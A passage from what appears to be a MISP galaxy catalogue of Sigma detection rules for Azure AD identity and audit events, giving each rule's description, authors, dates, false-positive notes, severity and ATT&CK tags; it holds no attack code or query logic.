UUID 53acd925-2003-440d-a1f3-71a5253fe237 which can be used as unique global reference for Anonymous IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gloria Lee, '@gleeiamglo'
creation_date 2023/08/22
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins']
filename azure_identity_protection_anonymous_ip_address.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

New Country

Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.

Internal MISP references

UUID adf9f4d2-559e-4f5c-95be-c28dff0b1476 which can be used as unique global reference for New Country in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_new_coutry_region.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Suspicious Inbox Forwarding Identity Protection

Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address

Internal MISP references

UUID 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d which can be used as unique global reference for Suspicious Inbox Forwarding Identity Protection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['A legitimate forwarding rule.']
filename azure_identity_protection_inbox_forwarding_rule.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1140', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Atypical Travel

Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.

Internal MISP references

UUID 1a41023f-1e70-4026-921a-4d9341a9038e which can be used as unique global reference for Atypical Travel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_atypical_travel.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Primary Refresh Token Access Attempt

Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft

Internal MISP references

UUID a84fc3b1-c9ce-4125-8e74-bdcdb24021f1 which can be used as unique global reference for Primary Refresh Token Access Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ["This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated."]
filename azure_identity_protection_prt_access.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Sign-In From Malware Infected IP

Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.

Internal MISP references

UUID 821b4dc3-1295-41e7-b157-39ab212dd6bd which can be used as unique global reference for Sign-In From Malware Infected IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['Using an IP address that is shared by many users']
filename azure_identity_protection_malware_linked_ip.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1090', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

Malicious IP Address Sign-In Suspicious

Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.

Internal MISP references

UUID 36440e1c-5c22-467a-889b-593e66498472 which can be used as unique global reference for Malicious IP Address Sign-In Suspicious in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_malicious_ip_address_suspicious.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1090', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

Unfamiliar Sign-In Properties

Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.

Internal MISP references

UUID 128faeef-79dd-44ca-b43c-a9e236a60f49 which can be used as unique global reference for Unfamiliar Sign-In Properties in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['User changing to a new device, location, browser, etc.']
filename azure_identity_protection_unfamilar_sign_in.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Malicious IP Address Sign-In Failure Rate

Indicates sign-in from a malicious IP address based on high failure rates.

Internal MISP references

UUID a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd which can be used as unique global reference for Malicious IP Address Sign-In Failure Rate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_malicious_ip_address.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1090', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

SAML Token Issuer Anomaly

Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns

Internal MISP references

UUID e3393cba-31f0-4207-831e-aef90ab17a8c which can be used as unique global reference for SAML Token Issuer Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_token_issuer_anomaly.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1606', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Azure AD Account Credential Leaked

Indicates that the user's valid credentials have been leaked.

Internal MISP references

UUID 19128e5e-4743-48dc-bd97-52e5775af817 which can be used as unique global reference for Azure AD Account Credential Leaked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['A rare hash collision.']
filename azure_identity_protection_leaked_credentials.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1589', 'attack.reconnaissance']
Related clusters

To see the related clusters, click here.

Anomalous Token

Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.

Internal MISP references

UUID 6555754e-5e7f-4a67-ad1c-4041c413a007 which can be used as unique global reference for Anomalous Token in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow'
creation_date 2023/08/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_anomalous_token.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Azure AD Threat Intelligence

Indicates user activity that is unusual for the user or consistent with known attack patterns.

Internal MISP references

UUID a2cb56ff-4f46-437a-a0fa-ffa4d1303cba which can be used as unique global reference for Azure AD Threat Intelligence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_threat_intel.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Activity From Anonymous IP Address

Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.

Internal MISP references

UUID be4d9c86-d702-4030-b52e-c7859110e5e8 which can be used as unique global reference for Activity From Anonymous IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_anonymous_ip_activity.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Impossible Travel

Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.

Internal MISP references

UUID b2572bf9-e20a-4594-b528-40bde666525a which can be used as unique global reference for Impossible Travel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['Connecting to a VPN, performing activity and then dropping and performing additional activity.']
filename azure_identity_protection_impossible_travel.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Suspicious Browser Activity

Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser

Internal MISP references

UUID 944f6adb-7a99-4c69-80c1-b712579e93e6 which can be used as unique global reference for Suspicious Browser Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_suspicious_browser.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Anomalous User Activity

Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.

Internal MISP references

UUID 258b6593-215d-4a26-a141-c8e31c1299a6 which can be used as unique global reference for Anomalous User Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_anomalous_user.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1098', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Detects when an end user consents to an application

Internal MISP references

UUID 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a which can be used as unique global reference for End User Consent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/28
falsepositive ['Unknown']
filename azure_app_end_user_consent.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

App Role Added

Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.

Internal MISP references

UUID b04934b2-0a68-4845-8a19-bdfed3a68a7a which can be used as unique global reference for App Role Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/19
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_role_added.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

Change to Authentication Method

Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.

Internal MISP references

UUID 4d78a000-ab52-4564-88a5-7ab5242b20c7 which can be used as unique global reference for Change to Authentication Method in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_change_to_authentication_method.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1556', 'attack.persistence', 'attack.defense_evasion', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Guest User Invited By Non Approved Inviters

Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.

Internal MISP references

UUID 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9 which can be used as unique global reference for Guest User Invited By Non Approved Inviters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/10
falsepositive ['A non malicious user is unaware of the proper process']
filename azure_guest_invite_failure.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Temporary Access Pass Added To An Account

Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated

Internal MISP references

UUID fa84aaf5-8142-43cd-9ec2-78cfebf878ce which can be used as unique global reference for Temporary Access Pass Added To An Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/10
falsepositive ['Administrator adding a legitimate temporary access pass']
filename azure_tap_added.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Azure Subscription Permission Elevation Via AuditLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

Internal MISP references

UUID ca9bf243-465e-494a-9e54-bf9fc239057d which can be used as unique global reference for Azure Subscription Permission Elevation Via AuditLogs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/26
falsepositive ['If this was approved by System Administrator.']
filename azure_subscription_permissions_elevation_via_auditlogs.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Account Created And Deleted Within A Close Time Frame

Detects when an account was created and deleted in a short period of time.

Internal MISP references

UUID 6f583da0-3a90-4566-a4ed-83c09fe18bbf which can be used as unique global reference for Account Created And Deleted Within A Close Time Frame in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
creation_date 2022/08/11
falsepositive ['Legit administrative action']
filename azure_ad_account_created_deleted.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Bitlocker Key Retrieval

Monitor and alert for Bitlocker key retrieval.

Internal MISP references

UUID a0413867-daf3-43dd-9245-734b3a787942 which can be used as unique global reference for Bitlocker Key Retrieval in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_bitlocker_key_retrieval.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Added Owner To Application

Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.

Internal MISP references

UUID 74298991-9fc4-460e-a92e-511aa60baec1 which can be used as unique global reference for Added Owner To Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/02
falsepositive ['When a new application owner is added by an administrator']
filename azure_app_owner_added.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1552', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Password Reset By User Account

Detect when a user has reset their password in Azure AD

Internal MISP references

UUID 340ee172-4b67-4fb4-832f-f961bdc1f3aa which can be used as unique global reference for Password Reset By User Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author YochanaHenderson, '@Yochana-H'
creation_date 2022/08/03
falsepositive ['If this was approved by System Administrator or confirmed user action.']
filename azure_user_password_change.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.credential_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

User Added To Group With CA Policy Modification Access

Monitor and alert on group membership additions of groups that have CA policy modification access

Internal MISP references

UUID 91c95675-1f27-46d0-bead-d1ae96b97cd3 which can be used as unique global reference for User Added To Group With CA Policy Modification Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'
creation_date 2022/08/04
falsepositive ['User removed from the group is approved']
filename azure_group_user_addition_ca_modification.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Azure Domain Federation Settings Modified

Identifies when an user or application modified the federation settings on the domain.

Internal MISP references

UUID 352a54e1-74ba-4929-9d47-8193d67aba1e which can be used as unique global reference for Azure Domain Federation Settings Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/06
falsepositive ['Federation Settings being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_federation_modified.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Added Credentials to Existing Application

Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.

Internal MISP references

UUID cbb67ecc-fb70-4467-9350-c910bdf7c628 which can be used as unique global reference for Added Credentials to Existing Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/05/26
falsepositive ['When credentials are added/removed as part of the normal working hours/workflows']
filename azure_app_credential_added.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1098.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Bulk Deletion Changes To Privileged Account Permissions

Detects when a user is removed from a privileged role. Bulk changes should be investigated.

Internal MISP references

UUID 102e11e3-2db5-4c9e-bc26-357d42585d21 which can be used as unique global reference for Bulk Deletion Changes To Privileged Account Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/05
falsepositive ['Legtimate administrator actions of removing members from a role']
filename azure_priviledged_role_assignment_bulk_change.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

User Added To Privilege Role

Detects when a user is added to a privileged role.

Internal MISP references

UUID 49a268a4-72f4-4e38-8a7b-885be690c5b5 which can be used as unique global reference for User Added To Privilege Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/06
falsepositive ['Legtimate administrator actions of adding members from a role']
filename azure_priviledged_role_assignment_add.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

App Granted Microsoft Permissions

Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD

Internal MISP references

UUID c1d147ae-a951-48e5-8b41-dcd0170c7213 which can be used as unique global reference for App Granted Microsoft Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/10
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_permissions_msft.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

CA Policy Removed by Non Approved Actor

Monitor and alert on conditional access changes where non approved actor removed CA Policy.

Internal MISP references

UUID 26e7c5e2-6545-481e-b7e6-050143459635 which can be used as unique global reference for CA Policy Removed by Non Approved Actor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Corissa Koopmans, '@corissalea'
creation_date 2022/07/19
falsepositive ['Misconfigured role permissions', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.']
filename azure_aad_secops_ca_policy_removedby_bad_actor.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']
Related clusters

To see the related clusters, click here.

App Granted Privileged Delegated Or App Permissions

Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions

Internal MISP references

UUID 5aecf3d5-f8a0-48e7-99be-3a759df7358f which can be used as unique global reference for App Granted Privileged Delegated Or App Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/28
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_privileged_permissions.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

New CA Policy by Non-approved Actor

Monitor and alert on conditional access changes.

Internal MISP references

UUID 0922467f-db53-4348-b7bf-dee8d0d348c6 which can be used as unique global reference for New CA Policy by Non-approved Actor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Corissa Koopmans, '@corissalea'
creation_date 2022/07/18
falsepositive ['Misconfigured role permissions', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.']
filename azure_aad_secops_new_ca_policy_addedby_bad_actor.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1548']
Related clusters

To see the related clusters, click here.

CA Policy Updated by Non Approved Actor

Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.

Internal MISP references

UUID 50a3c7aa-ec29-44a4-92c1-fce229eef6fc which can be used as unique global reference for CA Policy Updated by Non Approved Actor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Corissa Koopmans, '@corissalea'
creation_date 2022/07/19
falsepositive ['Misconfigured role permissions', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.']
filename azure_aad_secops_ca_policy_updatedby_bad_actor.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Changes To PIM Settings

Detects when changes are made to PIM roles

Internal MISP references

UUID db6c06c4-bf3b-421c-aa88-15672b88c743 which can be used as unique global reference for Changes To PIM Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/09
falsepositive ['Legit administrative PIM setting configuration changes']
filename azure_pim_change_settings.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Users Added to Global or Device Admin Roles

Monitor and alert for users added to device admin roles.

Internal MISP references

UUID 11c767ae-500b-423b-bae3-b234450736ed which can be used as unique global reference for Users Added to Global or Device Admin Roles in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_users_added_to_device_admin_roles.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

User State Changed From Guest To Member

Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.

Internal MISP references

UUID 8dee7a0d-43fd-4b3c-8cd1-605e189d195e which can be used as unique global reference for User State Changed From Guest To Member in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/06/30
falsepositive ['If this was approved by System Administrator.']
filename azure_guest_to_member.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

New Root Certificate Authority Added

Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.

Internal MISP references

UUID 4bb80281-3756-4ec8-a88e-523c5a6fda9e which can be used as unique global reference for New Root Certificate Authority Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Shah Singh, '@cyb3rjy0t'
creation_date 2024/03/26
falsepositive ['Unknown']
filename azure_ad_new_root_ca_added.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1556']
Related clusters

To see the related clusters, click here.

PIM Alert Setting Changes To Disabled

Detects when PIM alerts are set to disabled.

Internal MISP references

UUID aeaef14c-e5bf-4690-a9c8-835caad458bd which can be used as unique global reference for PIM Alert Setting Changes To Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/09
falsepositive ['Administrator disabling PIM alerts as an active choice.']
filename azure_pim_alerts_disabled.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Certificate-Based Authentication Enabled

Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.

Internal MISP references

UUID c2496b41-16a9-4016-a776-b23f8910dc58 which can be used as unique global reference for Certificate-Based Authentication Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Shah Singh, '@cyb3rjy0t'
creation_date 2024/03/26
falsepositive ['Unknown']
filename azure_ad_certificate_based_authencation_enabled.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Application URI Configuration Changes

Detects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.

Internal MISP references

UUID 0055ad1f-be85-4798-83cf-a6da17c993b3 which can be used as unique global reference for Application URI Configuration Changes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/02
falsepositive ['When and administrator is making legitimate URI configuration changes to an application. This should be a planned event.']
filename azure_app_uri_modifications.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.t1078.004', 'attack.persistence', 'attack.credential_access', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Application AppID Uri Configuration Changes

Detects when a configuration change is made to an applications AppID URI.

Internal MISP references

UUID 1b45b0d1-773f-4f23-aedc-814b759563b1 which can be used as unique global reference for Application AppID Uri Configuration Changes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/02
falsepositive ['When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.']
filename azure_app_appid_uri_changes.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.credential_access', 'attack.privilege_escalation', 'attack.t1552', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Guest Users Invited To Tenant By Non Approved Inviters

Detects guest users being invited to tenant by non-approved inviters

Internal MISP references

UUID 4ad97bf5-a514-41a4-abd3-4f3455ad4865 which can be used as unique global reference for Guest Users Invited To Tenant By Non Approved Inviters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

PIM Approvals And Deny Elevation

Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.

Internal MISP references

UUID 039a7469-0296-4450-84c0-f6966b16dc6d which can be used as unique global reference for PIM Approvals And Deny Elevation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/09
falsepositive ['Actual admin using PIM.']
filename azure_pim_activation_approve_deny.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Delegated Permissions Granted For All Users

Detects when highly privileged delegated permissions are granted on behalf of all users

Internal MISP references

UUID a6355fbe-f36f-45d8-8efc-ab42465cbc52 which can be used as unique global reference for Delegated Permissions Granted For All Users in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/28
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_delegated_permissions_all_users.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']
Related clusters

